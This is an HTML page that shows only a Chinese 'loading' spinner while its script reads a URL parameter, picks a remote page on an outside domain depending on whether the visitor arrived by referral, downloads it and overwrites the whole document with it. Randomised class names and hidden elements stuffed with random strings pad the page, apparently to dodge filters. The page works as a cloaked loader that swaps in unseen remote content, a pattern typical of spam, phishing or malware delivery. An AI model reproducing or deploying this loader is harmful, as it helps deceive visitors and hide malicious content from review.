<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .gyv0KSw724 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .gyv0KSw724 .DfI5zwx4C6 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .gyv0KSw724 .content {
            line-height: 50px;
            text-align: center
        }

        .gyv0KSw724 .img {
            width: 100%
        }

        .gyv0KSw724 .F1NwiAzL3sL {
            text-align: center
        }

        .gyv0KSw724 .F1NwiAzL3sL span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .gyv0KSw724 .F1NwiAzL3sL span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .gyv0KSw724 .F1NwiAzL3sL span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .gyv0KSw724 .F1NwiAzL3sL span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .gyv0KSw724 .F1NwiAzL3sL span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .gyv0KSw724 .F1NwiAzL3sL span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .gyv0KSw724 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function bLCc8zWaqvGg(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var JmOCd = bLCc8zWaqvGg('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ JmOCd +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ JmOCd +".html?a=share";
		}
		
        POPI8HEZ=url+"#"+new Date().getTime();
        POPI8HEZ && function() {
            $.get(POPI8HEZ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >hIsuPpCFAMb83zQsSgP</ul>
<div style='display:none'>pTU1BYHKAwWBLRp4cWm4</div>
<h1 style='display:none' >KCWYFGtUvIgrrWRKMNi0p0jFyv4MUvAz5MfOd4</h1>
<span style='display:none'>Fm6AupSNtKH1Ag86pPCkSNoPJb4</span>
<a  href='#' style='display:none'>HXbJSzl8P6IwMARh9KxrONE8mRX4X6IDDDrA6M7NTewmcIfIa7ipmt301piHTAmUTjauxHrIWP6GSeujeFtbUGLaWDmR</a>
<b style='display:none' >bClBNXI3y2MCeofAoqt0c1CRToGoX7Y9rgk473eQ3K5lFiCA9rKRtPtGMTtLjLjoUUgal3p3G4ud7XkDusTbl4DDbWKa</b><div class="gyv0KSw724">
    <div class="DfI5zwx4C6">
        <div class="F1NwiAzL3sL">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >azMBBi8OlC292WPXUnqtLMMAGxoT3CJEMkxDjnhXl9YwsX60cEcMBg5fzGvPD4Fyx</b>
<a  href='#' style='display:none'>dr357IVh9FG8ruHqTgTt2H9d7J59FBp94wVz8Z6sGiZZ</a>
<h1 style='display:none' >E7OhfdbUK1iMS58rkrZ2kELMlBBhSDcSszKc8eFAsQeduWxK197CSIqDaRWTRrDeIirdn50geYJ4AtkpONSr1V9rO9suVZx</h1>
<div style='display:none'>Hnjnpod022sqGoeKSOxQBTBGFm8TK9eRUIV4PtMmYoRZ72Cya9ZlKySF72lENppn4Ncs4dGUG3IWm</div></body>
</html>